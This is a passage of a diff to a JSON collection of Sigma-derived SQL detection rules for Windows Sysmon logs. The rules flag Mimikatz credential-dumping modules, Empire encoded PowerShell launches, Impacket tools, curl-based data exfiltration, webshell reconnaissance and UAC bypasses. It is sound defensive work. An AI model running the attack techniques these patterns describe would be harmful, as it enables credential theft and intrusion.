LIKE '%::mstsc%' ESCAPE '\\' OR CommandLine LIKE '%::multirdp%' ESCAPE '\\') OR (CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%crypto::%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR 
CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%process::%' ESCAPE '\\' OR CommandLine LIKE '%vault::%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -NoP -sta -NonI -W Hidden -Enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc %' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -W Hidden -enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc%' ESCAPE '\\' OR CommandLine LIKE '% -enc SQB%' ESCAPE '\\' OR CommandLine LIKE '% -nop -exec bypass -EncodedCommand %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_mimikatz_command_line.yml" + "filename": "proc_creation_win_hktl_empire_powershell_launch.yml" }, { - "title": "Sticky Key Like Backdoor Execution", - "id": "2fdefcb3-dbda-401e-ae23-f0db027628bc", + "title": "HackTool - Impacket Tools Execution", + "id": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", "status": "test", - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", + "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" + "attack.execution", + "attack.t1557.001" ], "falsepositives": [ - "Unlikely" + "Legitimate use of the impacket tools" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' 
OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wt.exe' ESCAPE '\\') AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%Magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%Narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%DisplaySwitch.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\goldenPac%' ESCAPE '\\' OR Image LIKE '%\\\\karmaSMB%' ESCAPE '\\' OR Image LIKE '%\\\\kintercept%' ESCAPE '\\' OR Image LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\rpcdump%' ESCAPE '\\' OR Image LIKE '%\\\\samrdump%' ESCAPE '\\' OR Image LIKE '%\\\\secretsdump%' ESCAPE '\\' OR Image LIKE '%\\\\smbexec%' ESCAPE '\\' OR Image LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\wmiexec%' ESCAPE '\\' OR Image LIKE '%\\\\wmipersist%' ESCAPE '\\') OR (Image LIKE '%\\\\atexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\dcomexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\dpapi\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\findDelegation\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetADUsers\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetNPUsers\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getPac\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getST\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getTGT\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetUserSPNs\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\ifmap\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\mimikatz\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\netview\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\nmapAnswerMachine\\_windows.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\opdump\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\rdp\\_check\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sambaPipe\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\smbclient\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\smbserver\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sniffer\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sniff\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\split\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\ticketer\\_windows.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" + "filename": "proc_creation_win_hktl_impacket_tools.yml" }, { - "title": "Potential Data Exfiltration Activity Via CommandLine Tools", - "id": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", + "title": "Webshell Detection With Command Line Keywords", + "id": "bed2a484-9348-4143-8a8a-b801c979301c", "status": "experimental", - "description": "Detects the use of various CLI utilities exfiltrating data via web requests", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND CommandLine LIKE '% -ur%' ESCAPE '\\' 
AND CommandLine LIKE '% -me%' ESCAPE '\\' AND CommandLine LIKE '% -b%' ESCAPE '\\' AND CommandLine LIKE '% POST %' ESCAPE '\\') OR (Image LIKE '%\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--ur%' ESCAPE '\\' AND (CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\'))) AND ((CommandLine LIKE '%ToBase64String%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%nltest%' ESCAPE '\\' OR CommandLine LIKE '%ifconfig%' ESCAPE '\\' OR CommandLine LIKE '%hostname%' ESCAPE '\\' OR CommandLine LIKE '%net view%' ESCAPE '\\' OR CommandLine LIKE '%qprocess%' ESCAPE '\\' OR CommandLine LIKE '%netstat%' ESCAPE '\\' OR CommandLine LIKE '%systeminfo%' ESCAPE '\\' OR CommandLine LIKE '%tasklist%' ESCAPE '\\' OR CommandLine LIKE '%sc query%' ESCAPE '\\') OR (CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((OriginalFileName IN ('net.exe', 'net1.exe') AND (CommandLine LIKE '% user %' ESCAPE '\\' OR CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% group %' ESCAPE '\\')) OR (OriginalFileName = 'ping.exe' AND CommandLine LIKE '% -n %' 
ESCAPE '\\') OR (CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%cd /d %' ESCAPE '\\') OR (OriginalFileName = 'wmic.exe' AND CommandLine LIKE '% /node:%' ESCAPE '\\') OR ((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\quser.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\pathping.exe' ESCAPE '\\' OR Image LIKE '%\\\\tracert.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE '\\') OR OriginalFileName IN ('whoami.exe', 'sysinfo.exe', 'quser.exe', 'ipconfig.exe', 'pathping.exe', 'tracert.exe', 'netstat.exe', 'schtasks.exe', 'VSSADMIN.EXE', 'wevtutil.exe', 'tasklist.exe')) OR (CommandLine LIKE '% Test-NetConnection %' ESCAPE '\\' OR CommandLine LIKE '%dir \\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_data_exfiltration_via_cli.yml" + "filename": "proc_creation_win_webshell_detection.yml" }, { - "title": "MpiExec Lolbin", - "id": "729ce0ea-5d8f-4769-9762-e35de441586d", + "title": "PUA - AdFind Suspicious Execution", + "id": "9a132afa-654e-11eb-ae93-0242ac130002", "status": "test", - "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects AdFind execution with common flags seen used during attacks", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" ], "falsepositives": [ - "Unknown" + "Legitimate admin activity" ], "level": "high", "rule": [ - "SELECT * 
FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mpiexec.exe' ESCAPE '\\' OR Imphash = 'd8b52ef6aaa3a81501bdfff9dbb96217' OR Hashes LIKE '%IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217%' ESCAPE '\\') AND (CommandLine LIKE '% /n 1 %' ESCAPE '\\' OR CommandLine LIKE '% -n 1 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_mpiexec.yml" + "filename": "proc_creation_win_pua_adfind_susp_usage.yml" }, { - "title": "Potential Privilege Escalation via Service Permissions Weakness", - "id": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", - "status": "test", - "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", - "author": "Teymur Kheirkhabarov", + "title": "Port Forwarding Attempt Via SSH", + "id": "327f48c1-a6db-4eb8-875a-f6981f1b0183", + "status": "experimental", + "description": "Detects suspicious SSH tunnel 
port forwarding to a local port", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1574.011" + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1572", + "attack.t1021.001", + "attack.t1021.004" ], "falsepositives": [ - "Unknown" + "Administrative activity using a remote port forwarding to a local port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%services%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ServiceDll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')" ], - "filename": "proc_creation_win_registry_privilege_escalation_via_service_key.yml" + "filename": "proc_creation_win_ssh_port_forward.yml" }, { - "title": "Devtoolslauncher.exe Executes Specified Binary", - "id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", - "status": "test", - "description": "The Devtoolslauncher.exe executes other binary", - "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", + "title": "PUA - Fast Reverse Proxy (FRP) Execution", + "id": "32410e29-5f94-4568-b6a3-d91a8adad863", + "status": "experimental", + "description": "Detects the use of Fast Reverse Proxy. 
frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", + "author": "frack113, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Legitimate use of devtoolslauncher.exe by legitimate user" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\devtoolslauncher.exe' ESCAPE '\\' AND CommandLine LIKE '%LaunchForDeploy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\frpc.exe' ESCAPE '\\' OR Image LIKE '%\\\\frps.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\frpc.ini%' ESCAPE '\\' OR (Hashes LIKE '%MD5=7D9C233B8C9E3F0EA290D2B84593C842%' ESCAPE '\\' OR Hashes LIKE '%SHA1=06DDC9280E1F1810677935A2477012960905942F%' ESCAPE '\\' OR Hashes LIKE '%SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C%' ESCAPE '\\') OR md5 = '7d9c233b8c9e3f0ea290d2b84593c842' OR sha1 = '06ddc9280e1f1810677935a2477012960905942f' OR sha256 = '57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c'))" ], - "filename": "proc_creation_win_lolbin_devtoolslauncher.yml" + "filename": "proc_creation_win_pua_frp.yml" }, { - "title": "Abuse of Service Permissions to Hide Services Via Set-Service", - "id": "514e4c3a-c77d-4cde-a00f-046425e2301e", + "title": "Microsoft IIS Service Account Password Dumped", + "id": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", + "author": "Tim Rauch, Janantha Marasinghe", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Rare intended use of hidden services" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND CommandLine LIKE '%list %' ESCAPE '\\') AND ((CommandLine LIKE '% /config%' ESCAPE '\\' OR CommandLine LIKE '% /xml%' ESCAPE '\\' OR CommandLine LIKE '% -config%' ESCAPE '\\' OR CommandLine LIKE '% -xml%' ESCAPE '\\') OR ((CommandLine LIKE '% /@t%' ESCAPE '\\' OR CommandLine LIKE '% /text%' ESCAPE '\\' OR CommandLine LIKE '% /show%' ESCAPE '\\' OR CommandLine LIKE '% -@t%' ESCAPE '\\' OR CommandLine LIKE '% -text%' ESCAPE '\\' OR CommandLine LIKE '% -show%' ESCAPE '\\') AND (CommandLine LIKE '%:\\*' ESCAPE '\\' OR CommandLine LIKE '%password%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_hide_services_via_set_service.yml" + "filename": "proc_creation_win_iis_appcmd_service_account_password_dumped.yml" }, { - "title": "PUA - 3Proxy Execution", - "id": "f38a82d2-fba3-4781-b549-525efbec8506", + "title": "UEFI Persistence Via Wpbbin - ProcessCreation", + "id": 
"4abc0ec4-db5a-412f-9632-26659cddf145", "status": "experimental", - "description": "Detects the use of 3proxy, a tiny free proxy server", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.persistence", + "attack.defense_evasion", + "attack.t1542.001" ], "falsepositives": [ - "Administrative activity" + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\3proxy.exe' ESCAPE '\\' OR Description = '3proxy - tiny proxy server' OR CommandLine LIKE '%.exe -i127.0.0.1 -p%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_3proxy_execution.yml" + "filename": "proc_creation_win_wpbbin_potential_persistence.yml" }, { - "title": "UAC Bypass Using Event Viewer RecentViews", - "id": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", + "title": "Proxy Execution via Wuauclt", + "id": "af77cf95-c469-471c-b6a0-946c685c4798", "status": "test", - "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation" + "attack.t1218", + "attack.execution" ], "falsepositives": [ 
"Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\Event Viewer\\\\RecentViews%' ESCAPE '\\' OR CommandLine LIKE '%\\\\EventV~1\\\\RecentViews%' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%RunHandlerComServer%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /UpdateDeploymentProvider UpdateDeploymentProvider.dll %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_eventvwr_recentviews.yml" + "filename": "proc_creation_win_lolbin_wuauclt.yml" }, { - "title": "Winnti Malware HK University Campaign", - "id": "3121461b-5aa0-4a41-b910-66d25524edbb", - "status": "test", - "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", - "author": "Florian Roth (Nextron Systems), Markus Neis", + "title": "Renamed Office Binary Execution", + "id": "0b0cd537-fc77-4e6e-a973-e53495c1083d", + "status": "experimental", + "description": "Detects the execution of a renamed office binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR ParentImage LIKE '%\\\\hpqhvind.exe%' ESCAPE '\\') AND Image LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\') OR 
(ParentImage LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\' AND Image LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\Test.exe' ESCAPE '\\' AND Image LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR Image LIKE 'C:\\\\ProgramData\\\\DRM\\\\CLR\\\\CLR.exe' ESCAPE '\\' OR (ParentImage LIKE 'C:\\\\ProgramData\\\\DRM\\\\Windows%' ESCAPE '\\' AND Image LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('Excel.exe', 'MSACCESS.EXE', 'OneNote.exe', 'POWERPNT.EXE', 'WinWord.exe') OR Description IN ('Microsoft Access', 'Microsoft Excel', 'Microsoft OneNote', 'Microsoft PowerPoint', 'Microsoft Word')) AND NOT ((Image LIKE '%\\\\EXCEL.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR Image LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR Image LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml" + "filename": "proc_creation_win_renamed_office_processes.yml" }, { - "title": "Remote Access Tool - Anydesk Execution From Suspicious Folder", - "id": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", - "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", - "author": "Florian Roth (Nextron Systems)", + "title": "Execution via stordiag.exe", + "id": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", + "status": "test", + "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", + "author": "Austin Songer (@austinsonger)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate use of AnyDesk from a non-standard folder" + "Legitimate usage of stordiag.exe." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH') AND NOT ((Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%Program Files (x86)\\\\AnyDesk%' ESCAPE '\\' OR Image LIKE '%Program Files\\\\AnyDesk%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\stordiag.exe' ESCAPE '\\' AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\fltmc.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'c:\\\\windows\\\\system32\\\\%' ESCAPE '\\' OR ParentImage LIKE 'c:\\\\windows\\\\syswow64\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" + "filename": "proc_creation_win_stordiag_susp_child_process.yml" }, { - "title": "Suspicious RDP Redirect Using TSCON", - "id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", + "title": "Script Interpreter Execution From Suspicious Folder", + "id": "1228c958-e64e-4e71-92ad-7d429f4138ba", "status": "test", - "description": "Detects a suspicious RDP session redirect using tscon.exe", + "description": "Detects a suspicious script executions in temporary folders or folders accessible 
by environment variables", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1563.002", - "attack.t1021.001", - "car.2013-07-002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /dest:rdp-tcp:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass %' ESCAPE '\\' OR CommandLine LIKE '%/e:vbscript %' ESCAPE '\\' OR CommandLine LIKE '%/e:javascript %' ESCAPE '\\') OR OriginalFileName IN ('powershell.exe', 'pwsh.dll', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe')) AND (Image LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR Image 